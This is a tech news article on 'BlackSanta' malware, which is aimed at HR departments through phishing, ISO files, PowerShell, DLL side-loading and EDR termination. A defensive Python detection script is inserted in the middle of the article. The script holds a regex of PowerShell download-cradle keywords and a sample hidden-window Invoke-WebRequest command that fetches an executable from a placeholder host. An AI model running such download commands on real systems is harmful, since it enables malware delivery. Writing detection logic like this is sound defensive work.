Russian hackers target HR departments with vicious new 'BlackSanta' malware


  • Russian hackers target HR departments with BlackSanta malware
  • Infection chain uses phishing emails and malicious ISO files
  • BlackSanta disables EDR tools to enable deeper compromise

Russian hackers have been targeting Human Resources (HR) departments at organizations around the world with a never-before-seen piece of malware called BlackSanta.

The campaign was spotted by cybersecurity researchers at Aryaka, who said the attacks have been going on for at least a year and involve a rather sophisticated infection chain.

It most likely starts with a phishing email pretending to share resumes of prospective employees, including a link to a Dropbox folder holding an ISO image. These files are clones of optical discs and were rather popular in the early 2000s until thumb drives became more affordable. These days, however, they can be seen as a major red flag since they are rarely used outside of scams.


EDR killer

Still, those who don’t spot the ruse and download and extract the ISO will find multiple files, including a shortcut file and a PowerShell script. The script downloads a malicious DLL file and a legitimate PDF reader, which is used to side-load the DLL.

The DLL first checks whether it is running in a sandbox environment or a virtual machine. If it deems the machine worthy of further infection, it downloads additional payloads, among which is BlackSanta.
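As an added defender-side example, not taken from Aryaka's report or from this article, the following Python script correlates constructed process-creation and image-load records (a simplified stand-in for Sysmon process-create and image-load events) to flag two steps of the chain described above: a PowerShell process carrying a download cradle on its command line, and a process dropped into a user-writable directory by that PowerShell which then loads a DLL from its own folder, the classic side-loading pattern. The `Event` layout, the user-writable path markers, the cradle keyword list and all sample events (including the `example.invalid` URL) are assumptions made for this illustration and should be tuned to your own telemetry.

```python
"""Correlate constructed endpoint events for the ISO -> PowerShell -> side-loaded
DLL pattern. Event fields are a simplified, constructed stand-in for Sysmon
process-create (kind="proc") and image-load (kind="load") records."""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Assumed markers for user-writable locations where dropped binaries usually land.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")

# Assumed PowerShell download-cradle keywords; extend for your environment.
# Note: scripts run with -File or -EncodedCommand hide these from the command
# line, so pair this with PowerShell script-block logging in practice.
DOWNLOAD_CRADLE = re.compile(
    r"invoke-webrequest|downloadfile|downloadstring|\biwr\b|start-bitstransfer", re.I)


@dataclass
class Event:
    ts: int          # constructed monotonic timestamp
    kind: str        # "proc" (process create) or "load" (image load)
    pid: int
    ppid: int
    image: str       # full path of the process image
    cmdline: str = ""
    loaded: str = "" # DLL path for kind == "load"


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def in_user_writable(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE)


def find_chain(events):
    """Return (finding, pid) tuples for events matching the two heuristics."""
    procs = {e.pid: e for e in events if e.kind == "proc"}
    findings = []
    for e in events:
        # Heuristic 1: PowerShell process whose command line fetches content.
        if (e.kind == "proc" and basename(e.image) == "powershell.exe"
                and DOWNLOAD_CRADLE.search(e.cmdline)):
            findings.append(("powershell-download", e.pid))
        # Heuristic 2: process in a user-writable dir, spawned by PowerShell,
        # loading a DLL that sits in the same directory as its executable.
        elif e.kind == "load":
            proc = procs.get(e.pid)
            if proc is None:
                continue
            parent = procs.get(proc.ppid)
            same_dir = (PureWindowsPath(proc.image).parent
                        == PureWindowsPath(e.loaded).parent)
            spawned_by_ps = (parent is not None
                             and basename(parent.image) == "powershell.exe")
            if same_dir and in_user_writable(proc.image) and spawned_by_ps:
                findings.append(("dll-sideload", e.pid))
    return findings


# Constructed sample telemetry: one benign PowerShell, one benign reader in
# Program Files, and the suspicious pair described in the article.
SAMPLE_EVENTS = [
    Event(1, "proc", 1000, 1, r"C:\Windows\explorer.exe"),
    Event(2, "proc", 1500, 1000,
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          cmdline="powershell.exe -c Get-Date"),
    Event(3, "proc", 2000, 1000,
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          cmdline=r'powershell.exe -w hidden -c "Invoke-WebRequest '
                  r'http://example.invalid/r -OutFile $env:TEMP\pdfview.exe"'),
    Event(4, "proc", 2500, 1000, r"C:\Program Files\PDFReader\reader.exe"),
    Event(5, "load", 2500, 1000, r"C:\Program Files\PDFReader\reader.exe",
          loaded=r"C:\Program Files\PDFReader\render.dll"),
    Event(6, "proc", 3000, 2000, r"C:\Users\alice\AppData\Local\Temp\pdfview.exe"),
    Event(7, "load", 3000, 2000, r"C:\Users\alice\AppData\Local\Temp\pdfview.exe",
          loaded=r"C:\Users\alice\AppData\Local\Temp\libpdf.dll"),
]

if __name__ == "__main__":
    for finding, pid in find_chain(SAMPLE_EVENTS):
        print(f"{finding}: pid {pid}")
```

The two heuristics are deliberately independent so that either alone produces a lower-severity signal, while both on the same host within a short window (PowerShell download followed by a child process side-loading from a temp directory) is the combination worth paging on; the legitimate reader under Program Files loading its own DLL is not flagged because it was not spawned by PowerShell and does not live in a user-writable path.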

This piece of malware is described as an “EDR killer”, meaning it terminates endpoint detection and response tools before further payloads are deployed.

Its behavior also varies depending on which EDR solution it finds on the target device. For example, it can suppress Windows notifications so that it keeps running even as the OS tries to alert the user about the ongoing attack.

Aryaka says the attackers were spotted in the wild, but did not say how many organizations were attacked or how many actually fell victim. It also did not discuss the identity of the attackers, but judging by the modus operandi, it doesn’t seem to be any of the more prominent state-sponsored groups.

Via BleepingComputer



Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.
